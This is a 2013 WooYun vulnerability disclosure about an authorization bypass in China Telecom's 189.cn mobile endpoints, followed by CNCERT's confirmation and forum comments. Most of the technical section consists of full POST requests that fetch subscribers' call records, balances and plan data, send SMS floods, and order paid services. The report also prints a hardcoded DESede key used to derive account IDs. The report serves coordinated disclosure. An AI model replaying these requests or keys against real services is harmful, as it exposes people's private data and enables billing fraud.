当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-017649

漏洞标题:某运营商权限绕过漏洞可导致千万级敏感信息泄漏(包括通话纪录)

相关厂商:189.cn

漏洞作者: O.o

提交时间:2013-01-22 08:41

修复时间:2013-03-08 08:42

公开时间:2013-03-08 08:42

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-01-22: 细节已通知厂商并且等待厂商处理中
2013-01-24: 厂商已经确认,细节仅向厂商公开
2013-02-03: 细节向核心白帽子及相关领域专家公开
2013-02-13: 细节向普通白帽子公开
2013-02-23: 细节向实习白帽子公开
2013-03-08: 细节向公众公开

简要描述:

泄漏信息过于敏感,实现方法过于简单,所以标题和描述不会泄漏信息的才好。

详细说明:

获取用户流量信息
POST HTTP://wapsc.189.cn:8006/wapLogin/getFlow.action
Post值:
accountid=用户ID &channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


登陆客户端发短信(直接形成短信轰炸)
POST HTTP://wapsc.189.cn:8006/wapLogin/sendSms.action
数据:
accountid=xxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


查询余额
POST HTTP://wapsc.189.cn:8006/wapLogin/getReal.action
数据
accountid=xxxxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


基础业务情况
POST HTTP://wapsc.189.cn:8006 /BasicBuss/getAllBasicBusiness.action
accNbr=xxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


套餐使用量查询
POST HTTP://wapsc.189.cn:8006/productMessage/mealUseCase.action
数据
accountid=xxxxxxxxxxx&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


【通话详单】对,没看错。详单。详细到秒!
POST HTTP://wapsc.189.cn:8006/BillDetails/getBillDetail.action
startTime=20130120&endTime=20130121&accNbr=xxxxxxxxxxxxxxxx&type=21&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

.png


还有些杂七杂八的接口看图把=。=

GET话费套餐信息.png

.png

.png


还有一些远程操纵订购产品
POST HTTP://wapsc.189.cn:8006/businessOperations/getAllValueAdds.action
accountid=xxxxxxxxxxx&pageSize=10&currentPage=1&fuzzyStr=&doType=TYPE1&orderMsg=&isCall=true&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2
会返回当前增值业务列表

.png


找到想要开通的服务,记下goodsId
获取产品valueAddId,变量为goodsid
POST HTTP://wapsc.189.cn:8006/businessOperations/BusOperInfo.action HTTP/1.1
accountid=xxxxxxxxxxxxxx&goodsId=100311&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

QQVIP的产品信息.png


返回(QQ加油站为例)
{"goodsChannel":"ISMP","goodsCode":"123000000000000000434","goodsDesc":"<p>\n\t&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; QQ加油站是腾讯的高端增值业务服务,QQ加油站用户能够享受到腾讯公司所提供的除普通功能以外的40多项增值服务内容。从网站到手机到客户端,QQ加油站用户可以享受比普通用户更多的乐趣,更多惊喜和更优质的服务。同时还可以参与线上线下活动,拥有其他精彩业务的打折特权。<\/p>\n<p>\n\t&nbsp;<\/p>\n<p>\n\t注:此业务属于代扣费(SP)类增值业务。<\/p>\n","goodsId":"100311","goodsName":"腾讯QQ加油站","goodsPrice":"10","service_Company":"深圳腾讯公司"}
取得goodsCode,
订购任意附属包
POST HTTP://wapsc.189.cn:8006/businessOperations/handleBusiness.action HTTP/1.1
accountid=xxxxxxxxx&valueAddId=123000000000000000434&action=1&doType=ISMP&channelTypeId=001&cityCode=C0713CC421F4E2CF&cityName=%E5%9B%9B%E5%B7%9D+%E6%88%90%E9%83%BD&serviceId=2

QQ会员订购成功.png


返回
{"effectiveTime":"","expireTime":"20130121125312","message":"成功","resultCode":"0"}
订购成功,!
=============华丽的分割线==============================
Accountid获取算法在包里面有,自己可以写个生成main就能用。
采用了DESede加密算法,采用A314BA5A3C85E86KK887WSWS为密钥

漏洞证明:

详细说明即为漏洞证明

修复方案:

后端多加点东西。
具体你们比我懂

版权声明:转载请注明来源 O.o@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:14

确认时间:2013-01-24 23:52

厂商回复:

CNVD确认并复现所述情况,已经在23日转由CNCERT四川分中心直接协调当地基础电信运营企业处置。
按完全影响机密性(可遍历),部分影响完整性、可用性进行评分,基本危害评分8.97,发现技术难度系数1.1,涉及行业或单位影响系数1.4,综合rank=13.813

最新状态:

暂无

漏洞评价:

评论

  1. 2013-01-22 08:56 | liyang ( 路人 | Rank:25 漏洞数:11 | 低调 沉默 守望)

    关注~~坐等楼主上电视~~

  2. 2013-01-22 09:15 | Shell ( 路人 | Rank:14 漏洞数:4 | shell)

    关注~~

  3. 2013-01-22 10:10 | qiaoy ( 普通白帽子 | Rank:110 漏洞数:16 )

    .

  4. 2013-01-22 10:21 | 蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)

    @only_guest 妹纸,来接客了

  5. 2013-01-22 10:28 | 倒霉熊 ( 路人 | Rank:20 漏洞数:6 | *好简要)

    前排 接客了

  6. 2013-01-22 11:16 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @易水寒

  7. 2013-01-22 11:51 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    已经办好护照了。

  8. 2013-01-22 15:57 | 易水寒 ( 实习白帽子 | Rank:67 漏洞数:6 )

    围观。

  9. 2013-01-23 21:17 | 革命往事 ( 路人 | Rank:17 漏洞数:2 | 革命已成往事)

    猛烈的拖

  10. 2013-01-23 22:46 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @革命往事 难道大神您有防水表之神功?

  11. 2013-01-23 22:49 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    还不确认么?确认了再奖励个同厂商的。另外还有个同厂商的正在截图~

  12. 2013-01-25 09:51 | cncert国家互联网应急中心(乌云厂商)

    这个是怎么挖掘到的?是手机客户端的接口吧

  13. 2013-01-25 10:40 | 风萧萧 认证白帽子 ( 核心白帽子 | Rank:1020 漏洞数:76 | 人这一辈子总要动真格的爱上什么人)

    @易水寒 赶紧发你的吧

  14. 2013-01-25 17:44 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @cncert国家互联网应急中心 PM了~

  15. 2013-03-08 12:27 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    艾玛我去,通话记录完爆,要是手机上删除记录服务器上还是会有吧。。。

  16. 2013-03-08 15:53 | O.o ( 普通白帽子 | Rank:105 漏洞数:12 | ส็็็็็็็็็็็็็็็็็็็...)

    @疯狗 o(︶︿︶)o 唉

  17. 2013-03-08 16:02 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    accountid是怎么得到的啊?

  18. 2013-03-08 16:21 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @苏南同学 看文章最后几行

  19. 2013-03-08 16:49 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    @疯狗 附件包没有附件包啊

  20. 2013-03-08 18:16 | horseluke ( 普通白帽子 | Rank:116 漏洞数:18 | Realize the dream in earnest.)

    手机应用?

  21. 2013-03-08 18:17 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    !!!

  22. 2013-03-08 20:57 | 苏南同学 ( 实习白帽子 | Rank:41 漏洞数:5 | 苏南同学,就是苏南同学~~~)

    只有四川的号码可以测试

  23. 2013-03-09 00:18 | sipcer ( 实习白帽子 | Rank:44 漏洞数:9 )

    @O.o 这洞是怎么挖的?accountid算法怎么得到的?